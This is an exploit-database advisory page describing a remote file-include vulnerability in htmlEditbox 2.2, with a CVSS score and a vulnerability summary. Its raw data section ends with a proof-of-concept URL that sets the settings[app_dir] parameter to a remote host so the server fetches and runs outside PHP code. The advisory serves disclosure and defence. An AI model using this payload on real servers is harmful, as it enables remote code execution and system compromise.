header-logo
Suggest Exploit
vendor:
htmlEditbox
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
Unknown
CWE
Product Name: htmlEditbox
Affected Version From: 2.2
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

htmlEditbox Remote File Include Vulnerability

htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to execute malicious PHP code in the context of the webserver. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23664/info

htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this vulnerability to execute malicious PHP code in the context of the webserver. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

htmlEditbox 2.2 is vulnerable to this issue; other versions may also be affected. 

http://www.example.com/_editor.php?settings[app_dir]=http://shell

Navigation

Suggest Exploit

Services By CQR